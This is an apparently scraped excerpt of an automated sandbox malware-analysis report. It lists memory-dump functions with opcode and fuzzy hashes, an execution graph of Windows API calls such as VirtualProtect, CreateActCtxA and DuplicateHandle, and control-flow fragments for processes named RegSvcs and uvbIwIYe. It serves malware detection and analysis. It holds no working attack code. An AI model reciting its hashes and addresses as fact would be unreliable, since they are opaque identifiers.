                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29b1aca210b564480ab61465d26af39df1cf39ee2c262f51e17fbe432b6eb2b1
                                                • Instruction ID: 4b71907631f0c9a744f03ece355c478f5ec34f4078c24547c6a4ae3296b52ada
                                                • Opcode Fuzzy Hash: 29b1aca210b564480ab61465d26af39df1cf39ee2c262f51e17fbe432b6eb2b1
                                                • Instruction Fuzzy Hash: A7316E34E106099FCB59DF65C86469EB7B2FF89300F10C529EA16E7340EB71AD46CB50
                                                Function 068D3AE8 Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1df01c5089e7accfcfaac1d3cc7732b9477b5ddf6909f0082c80f449fc219e8
                                                • Instruction ID: 72d888ff382690293d3443043c44cb3c528fffc2ec3c89bc4ff052670282786d
                                                • Opcode Fuzzy Hash: d1df01c5089e7accfcfaac1d3cc7732b9477b5ddf6909f0082c80f449fc219e8
                                                • Instruction Fuzzy Hash: 16216975F016199FDB10DFB9D881BAEBBF5BB49310F148029EA05E7380EA35DC418BA1
                                                Function 068D3AF8 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a581c5b6dfd3ec5bcbe0fe8d4446c3416dd67f39cf39ac6e8d5d646275e4488
                                                • Instruction ID: 99d64fb6adcc844c1827a91571bffb8ac675a33aabff8a653785ebcae11c4d48
                                                • Opcode Fuzzy Hash: 4a581c5b6dfd3ec5bcbe0fe8d4446c3416dd67f39cf39ac6e8d5d646275e4488
                                                • Instruction Fuzzy Hash: F8212775E016189FDB50DF69D980AAEBBF1BB48710F158029EA05E7384EA31DD408BA1
                                                Function 068D3E40 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47391211d28a675931b8847ee5cf33dfbd6d162d4820b99f093dbe19b0db9a64
                                                • Instruction ID: 1659cb01fcbef61bb7b1b4dd8b021c882f356cc7dc64cca0800a3e478f078aed
                                                • Opcode Fuzzy Hash: 47391211d28a675931b8847ee5cf33dfbd6d162d4820b99f093dbe19b0db9a64
                                                • Instruction Fuzzy Hash: 4211F930B102110FCB619A7C941072EB7E7DFCA714F10847EEA8AC7781DB65DC4283A2
                                                Function 068D3C08 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25769fc13aae23a48cc79c7145c0ddfe3cfe88677067ddad18678927b898ffa0
                                                • Instruction ID: 34c80958e3b7534fe93d28cb779c53f1615f27e5a7ac93c0e68fec3d09b3613d
                                                • Opcode Fuzzy Hash: 25769fc13aae23a48cc79c7145c0ddfe3cfe88677067ddad18678927b898ffa0
                                                • Instruction Fuzzy Hash: 7C118E35B505285FCB64D678D8146AF77AAFBC9310B014539D606E7344DE35DC018BE2
                                                Function 068D9F00 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cafb3ac4d6fc50fdf0f0ff9d21e6cb6c1b7f78bde91bedfcf23f50e5a480dc8c
                                                • Instruction ID: eb416003ee3d2ffd69205073ebca69ca874f9731e7f3b9600b7af9d917c16754
                                                • Opcode Fuzzy Hash: cafb3ac4d6fc50fdf0f0ff9d21e6cb6c1b7f78bde91bedfcf23f50e5a480dc8c
                                                • Instruction Fuzzy Hash: 16112230B006005FCB61EA78D801B9E7BE5EB8A714F11447AF24AD7342EA75DD42C3E0
                                                Function 068D3A30 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33798362250bb5baf8e481d1416c42b31ea92bdb54ade3be994ed0a843a193d1
                                                • Instruction ID: 6215eeb08cc19cc32893a6e950c93c1cf4bb5c05c4665865172f502ec1b313fd
                                                • Opcode Fuzzy Hash: 33798362250bb5baf8e481d1416c42b31ea92bdb54ade3be994ed0a843a193d1
                                                • Instruction Fuzzy Hash: AB2113B5D00248AFCB20CF9AD884ACEFBF4FB49320F10841AE918A7310D374A944CFA5
                                                Function 068D38C0 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a484feeba27caf43c18658b0c635cc8c8ec93e82f875fabb4603dfdaf0083fdd
                                                • Instruction ID: 666f18e375ec54753c89740d5060c9e811c057c8bd160e9766e05512e0e6695e
                                                • Opcode Fuzzy Hash: a484feeba27caf43c18658b0c635cc8c8ec93e82f875fabb4603dfdaf0083fdd
                                                • Instruction Fuzzy Hash: 2B21F2B5D01259AFDB10CF9AD885ADEFBB8FB49310F10812AE918A3200C3746944CFA5
                                                Function 068DED9B Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc0cb93524bcf2012cd040a640105ad5c2a2221b198cb68c084784c5ef30376a
                                                • Instruction ID: a3be7bffea331b0427935643b1a44333490dde573b013181ac458738bd37f91d
                                                • Opcode Fuzzy Hash: bc0cb93524bcf2012cd040a640105ad5c2a2221b198cb68c084784c5ef30376a
                                                • Instruction Fuzzy Hash: BE012B31B045104FCB669A3CA854B6F77EADBCA610F10847AF60ACB381DD58DD0283F2
                                                Function 068DC531 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9061317c771a165f447fcc36ef7484682dfdf00f5aaade95bf7858e42b1de177
                                                • Instruction ID: 913c3377487e4192698ae34bbb5cd709799cdb8248af04c72f19301813d7bee0
                                                • Opcode Fuzzy Hash: 9061317c771a165f447fcc36ef7484682dfdf00f5aaade95bf7858e42b1de177
                                                • Instruction Fuzzy Hash: 7201B131F504054FDF609A78E85136E77E7EBC9350F114439DA4AD7780EA30CC4287A1
                                                Function 068D3978 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f08c89a4fb665b708145b0fa398921336a7d9ac5f38f09ec4e9fab1dbbc4571a
                                                • Instruction ID: 6d07da5a7bf5ebdd2868345e6c4039f057fc38b8f30c02998e679134265a10e3
                                                • Opcode Fuzzy Hash: f08c89a4fb665b708145b0fa398921336a7d9ac5f38f09ec4e9fab1dbbc4571a
                                                • Instruction Fuzzy Hash: 6C21F4B1D01259AFDB10DF9AD884ADEFFB9FB49310F10811AE518A7200C3746944CFA5
                                                Function 068D3A38 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4985f0d9d99cbf6aeddf9afc9d5fc79791b827f9529e472e42d861b7d83a1505
                                                • Instruction ID: 52f237b0cee55cc8403614fd7b743d1557959f4e96e2b4279d2dd9624144282e
                                                • Opcode Fuzzy Hash: 4985f0d9d99cbf6aeddf9afc9d5fc79791b827f9529e472e42d861b7d83a1505
                                                • Instruction Fuzzy Hash: 3D21D0B5D00258AFCB10DF9AD884ADEFBF5FB49310F10852AE918A7310D379A944CFA5
                                                Function 068D3BF7 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58fd9d002a4d215aaad82c58e030c1a9184f75e35087e9a329571a86d35ec88
                                                • Instruction ID: cec4c5d06bc6f0cb5ac5ab2f1927cb099130f5e38c386f93b698864ed1f5b6ca
                                                • Opcode Fuzzy Hash: c58fd9d002a4d215aaad82c58e030c1a9184f75e35087e9a329571a86d35ec88
                                                • Instruction Fuzzy Hash: 51019E36F501285BCF649A78D8207AFB7EAEBC9310F050439DA46E3244EE248C0287A2
                                                Function 068D38C8 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9442e2102f1e2c2df986ececf35d41af96d6a7e160bb68ec568b0870031c42b3
                                                • Instruction ID: cf06cfb2c88cdc04da4d44fc5dfd4f0acfa33d6f57b5915b7bfefafd9d9fdf8a
                                                • Opcode Fuzzy Hash: 9442e2102f1e2c2df986ececf35d41af96d6a7e160bb68ec568b0870031c42b3
                                                • Instruction Fuzzy Hash: A211E2B1D01259AFCB10CF9AD884ADEFBF4FB49314F10812AE918A7300C378A944CFA5
                                                Function 068D3980 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1019f2c665faeacb767f234e40984b8fd6615ee14d43ec60391cd4b690cdd71f
                                                • Instruction ID: 48f41a1d06de0c70dca8aab51ef13cc2c86fe4dc8783b831433abaf2ec802e8d
                                                • Opcode Fuzzy Hash: 1019f2c665faeacb767f234e40984b8fd6615ee14d43ec60391cd4b690cdd71f
                                                • Instruction Fuzzy Hash: DA11D3B1D01259AFCB10DF9AD884ADEFBB4FB49310F10812AE918A7340C374A944CFA5
                                                Function 068D3E50 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8cd4422e74b205798a52d0e53df06d3e62f92f53dd369816f771bcbf8524bc3
                                                • Instruction ID: 92f1a4e151cd3ea61f92b5187f35d91bfb75b02f156769ff855a0a371790b034
                                                • Opcode Fuzzy Hash: c8cd4422e74b205798a52d0e53df06d3e62f92f53dd369816f771bcbf8524bc3
                                                • Instruction Fuzzy Hash: 1C01A435F105100FDB64956D9854B6FB3DBDBCA724F10843AE60EC7B80DE65DD4283A6
                                                Function 068DEDA8 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06d1cdc13a73f6032fb692854fe390170d619bc197411242ba7a5d6375a2b2cc
                                                • Instruction ID: 5197a75074f9a32feadd05907ce6eadc75b2505720377cb647c3a7d7a6829af1
                                                • Opcode Fuzzy Hash: 06d1cdc13a73f6032fb692854fe390170d619bc197411242ba7a5d6375a2b2cc
                                                • Instruction Fuzzy Hash: CA01AF31F045104FDB659A3CA854B6F73EADBC9720F108839E60ACB380EE65DD0287A1
                                                Function 068D9F10 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38dc62554972f90e3b7a96836a0dfade62bd328e3babec9acf34291f5639e4ec
                                                • Instruction ID: 5455435b03769256a8ad692a93f2a4b78013c62d1ed3f0c4c559a9270a7de816
                                                • Opcode Fuzzy Hash: 38dc62554972f90e3b7a96836a0dfade62bd328e3babec9acf34291f5639e4ec
                                                • Instruction Fuzzy Hash: 2B01AF30B105104FDB64EA6CD950BAE77EAEB89714F118838F60AC7344EA76DD4287D0
                                                Function 068D6070 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ec7ac7ed9ed526b844027d8316e223f074ea5c0e2c08e9a5bdd4cfeb0a1ee38
                                                • Instruction ID: bfab406c13b2bee84ff952f81c844dae2f1e4ee575ccaddff583452534a3755a
                                                • Opcode Fuzzy Hash: 8ec7ac7ed9ed526b844027d8316e223f074ea5c0e2c08e9a5bdd4cfeb0a1ee38
                                                • Instruction Fuzzy Hash: F4E09271D15109DFEB20CEB4C98176E77E9EF41344F2048AAD548DB241E333CE928740

                                                Execution Graph

                                                Execution Coverage:8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:107
                                                Total number of Limit Nodes:10
                                                execution_graph 24493 1694668 24494 169467a 24493->24494 24495 1694686 24494->24495 24499 1694779 24494->24499 24504 1693e28 24495->24504 24497 16946a5 24500 169479d 24499->24500 24508 1694878 24500->24508 24512 1694888 24500->24512 24505 1693e33 24504->24505 24520 1695c68 24505->24520 24507 1696ff6 24507->24497 24509 1694888 24508->24509 24511 169498c 24509->24511 24516 16944b0 24509->24516 24513 16948af 24512->24513 24514 169498c 24513->24514 24515 16944b0 CreateActCtxA 24513->24515 24515->24514 24517 1695918 CreateActCtxA 24516->24517 24519 16959db 24517->24519 24519->24519 24521 1695c73 24520->24521 24524 1695c88 24521->24524 24523 1697195 24523->24507 24525 1695c93 24524->24525 24528 1695cb8 24525->24528 24527 169727a 24527->24523 24529 1695cc3 24528->24529 24532 1695ce8 24529->24532 24531 169736d 24531->24527 24533 1695cf3 24532->24533 24535 169866b 24533->24535 24538 169ad19 24533->24538 24534 16986a9 24534->24531 24535->24534 24542 169ce00 24535->24542 24548 169ad41 24538->24548 24553 169ad50 24538->24553 24539 169ad2e 24539->24535 24543 169cdb4 24542->24543 24544 169ce06 24542->24544 24543->24534 24545 169ce55 24544->24545 24568 169cfc0 24544->24568 24572 169cfb0 24544->24572 24545->24534 24549 169ad50 24548->24549 24558 169ae48 24549->24558 24563 169ae37 24549->24563 24550 169ad5f 24550->24539 24554 169ad51 24553->24554 24556 169ae48 GetModuleHandleW 24554->24556 24557 169ae37 GetModuleHandleW 24554->24557 24555 169ad5f 24555->24539 24556->24555 24557->24555 24560 169ae49 24558->24560 24559 169ae7c 24559->24550 24560->24559 24561 169b080 GetModuleHandleW 24560->24561 24562 169b0ad 24561->24562 24562->24550 24565 169ae48 24563->24565 24564 169ae7c 24564->24550 24565->24564 24566 169b080 GetModuleHandleW 24565->24566 24567 169b0ad 24566->24567 24567->24550 24569 169cfcd 24568->24569 24570 169d007 24569->24570 24576 169b820 24569->24576 24570->24545 24573 169cfc0 24572->24573 24574 169b820 3 API calls 24573->24574 24575 169d007 24573->24575 24574->24575 24575->24545 24577 169b82b 24576->24577 24579 169dd18 24577->24579 24580 169d124 24577->24580 24579->24579 24581 169d12f 24580->24581 24582 1695ce8 3 API calls 24581->24582 24583 169dd87 24582->24583 24584 169dd96 24583->24584 24587 169ddf2 24583->24587 24591 169de00 24583->24591 24584->24579 24588 169de00 24587->24588 24589 169d1c0 GetFocus 24588->24589 24590 169de57 24588->24590 24589->24590 24592 169de2e 24591->24592 24593 169d1c0 GetFocus 24592->24593 24594 169de57 24592->24594 24593->24594 24617 169d4d8 24618 169d51e GetCurrentProcess 24617->24618 24620 169d569 24618->24620 24621 169d570 GetCurrentThread 24618->24621 24620->24621 24622 169d5ad GetCurrentProcess 24621->24622 24623 169d5a6 24621->24623 24625 169d5e3 24622->24625 24623->24622 24624 169d60b GetCurrentThreadId 24626 169d63c 24624->24626 24625->24624 24595 76c71ca 24599 76c7cb8 24595->24599 24603 76c7cc0 24595->24603 24596 76c71de 24600 76c7cc0 VirtualProtect 24599->24600 24602 76c7d42 24600->24602 24602->24596 24604 76c7d08 VirtualProtect 24603->24604 24605 76c7d42 24604->24605 24605->24596 24627 76c59b4 24629 76c7cb8 VirtualProtect 24627->24629 24630 76c7cc0 VirtualProtect 24627->24630 24628 76c59e5 24629->24628 24630->24628 24606 169d720 DuplicateHandle 24607 169d7b6 24606->24607 24612 76c66c1 24614 76c66c4 24612->24614 24613 76c6729 24614->24613 24615 76c7cb8 VirtualProtect 24614->24615 24616 76c7cc0 VirtualProtect 24614->24616 24615->24614 24616->24614

                                                Executed Functions

                                                Function 0169D4C9 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0169D556
                                                • GetCurrentThread.KERNEL32 ref: 0169D593
                                                • GetCurrentProcess.KERNEL32 ref: 0169D5D0
                                                • GetCurrentThreadId.KERNEL32 ref: 0169D629
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 62b9d7285993dd57078f0f7126a9fd20404cdf40f03389e9435d1433c53f1050
                                                • Instruction ID: b4280da484f0d20f19fb13b5f3dd767a94f5e2de897c619076fb5ac56d2bf1e8
                                                • Opcode Fuzzy Hash: 62b9d7285993dd57078f0f7126a9fd20404cdf40f03389e9435d1433c53f1050
                                                • Instruction Fuzzy Hash: 225165B09003498FDB14DFA9D948B9EBBF1FF88314F20846AE419A7350DB789985CF65
                                                Function 0169D4D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0169D556
                                                • GetCurrentThread.KERNEL32 ref: 0169D593
                                                • GetCurrentProcess.KERNEL32 ref: 0169D5D0
                                                • GetCurrentThreadId.KERNEL32 ref: 0169D629
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: dc47cc93b06f518402fd58da2548425d34460c5102190723006181d9a22bd006
                                                • Instruction ID: fd7d952e4d8ce6f320c9bc778f56cd1c61d21b5eb9e81535e6192bf7c9b6b4ca
                                                • Opcode Fuzzy Hash: dc47cc93b06f518402fd58da2548425d34460c5102190723006181d9a22bd006
                                                • Instruction Fuzzy Hash: C15178B09003098FDB14DFAAD848B9EBBF5FF88314F20846AE419A7350DB789945CF65
                                                Function 0169AE48 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 339 169ae48-169ae57 341 169ae59-169ae66 call 169a1a0 339->341 342 169ae83-169ae87 339->342 348 169ae68 341->348 349 169ae7c 341->349 344 169ae89-169ae93 342->344 345 169ae9b-169aedc 342->345 344->345 351 169aee9-169aef7 345->351 352 169aede-169aee6 345->352 395 169ae6e call 169b0d1 348->395 396 169ae6e call 169b0e0 348->396 349->342 353 169aef9-169aefe 351->353 354 169af1b-169af1d 351->354 352->351 356 169af09 353->356 357 169af00-169af07 call 169a1ac 353->357 359 169af20-169af27 354->359 355 169ae74-169ae76 355->349 358 169afb8-169b078 355->358 361 169af0b-169af19 356->361 357->361 390 169b07a-169b07d 358->390 391 169b080-169b0ab GetModuleHandleW 358->391 362 169af29-169af31 359->362 363 169af34-169af3b 359->363 361->359 362->363 366 169af48-169af51 call 169a1bc 363->366 367 169af3d-169af45 363->367 371 169af5e-169af63 366->371 372 169af53-169af5b 366->372 367->366 373 169af81-169af8e 371->373 374 169af65-169af6c 371->374 372->371 381 169afb1-169afb7 373->381 382 169af90-169afae 373->382 374->373 376 169af6e-169af7e call 169a1cc call 169a1dc 374->376 376->373 382->381 390->391 392 169b0ad-169b0b3 391->392 393 169b0b4-169b0c8 391->393 392->393 395->355 396->355
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0169B09E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4674d12abea7b3e77d0de81ca2c32d94a75f1f26c5bbc52230fe84547c159f87
                                                • Instruction ID: 669b4520679029561d938a55a7aa2423128e0e55bf301f926e89851377b6c7b9
                                                • Opcode Fuzzy Hash: 4674d12abea7b3e77d0de81ca2c32d94a75f1f26c5bbc52230fe84547c159f87
                                                • Instruction Fuzzy Hash: 3E7135B0A00B058FEB25CF69D85475ABBF6BF88210F008A2DD48AD7B50DB75E845CB95
                                                Function 016944B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 397 16944b0-16959d9 CreateActCtxA 400 16959db-16959e1 397->400 401 16959e2-1695a3c 397->401 400->401 408 1695a4b-1695a4f 401->408 409 1695a3e-1695a41 401->409 410 1695a51-1695a5d 408->410 411 1695a60 408->411 409->408 410->411 413 1695a61 411->413 413->413
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016959C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 7f50391ad247d783a8cea53615ffdf44d13ea19bb84b98da1e832d60e6138c00
                                                • Instruction ID: 9758ba89cebf6856bbf24c6283ba2459d40272b28cce68c37e01be727cfda10c
                                                • Opcode Fuzzy Hash: 7f50391ad247d783a8cea53615ffdf44d13ea19bb84b98da1e832d60e6138c00
                                                • Instruction Fuzzy Hash: F741D270C0171CCBEB25CFA9C884B9DBBB5BF49314F60805AD809AB251DB796946CF90
                                                Function 0169590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 414 169590d-16959d9 CreateActCtxA 416 16959db-16959e1 414->416 417 16959e2-1695a3c 414->417 416->417 424 1695a4b-1695a4f 417->424 425 1695a3e-1695a41 417->425 426 1695a51-1695a5d 424->426 427 1695a60 424->427 425->424 426->427 429 1695a61 427->429 429->429
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016959C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ff9515aa01e10ef200ee9b9e09a03d545676920e4c8fcb4547a7a8dd832fd167
                                                • Instruction ID: 7cb56a76423d63b0d180783c8d3423b51d0b2c6b2e1d38f7afcc28eb1e749b0c
                                                • Opcode Fuzzy Hash: ff9515aa01e10ef200ee9b9e09a03d545676920e4c8fcb4547a7a8dd832fd167
                                                • Instruction Fuzzy Hash: D541B170C01719CBEB25CFA9C884BDDBBB5BF49304F60816AD409AB250DB796946CF90
                                                Function 0169D720 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 435 169d720-169d7b4 DuplicateHandle 436 169d7bd-169d7da 435->436 437 169d7b6-169d7bc 435->437 437->436
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0169D7A7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.1554746792.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1690000_uvbIwIYe.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 7cced156771cf110c0d3a02aab4d606e70813f648cf505f286712e0d2fece954
                                                • Instruction ID: 024ecf7ccc430653916d30042290d1d152e5a984d37054ce67a78940431029b9
                                                • Opcode Fuzzy Hash: 7cced156771cf110c0d3a02aab4d606e70813f648cf505f286712e0d2fece954
                                                • Instruction Fuzzy Hash: DC21C4B59002489FDB10CF9AD984AEEBBF9FB48310F14841AE918A7350D378A954CFA5
                                                Function 0169D719 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

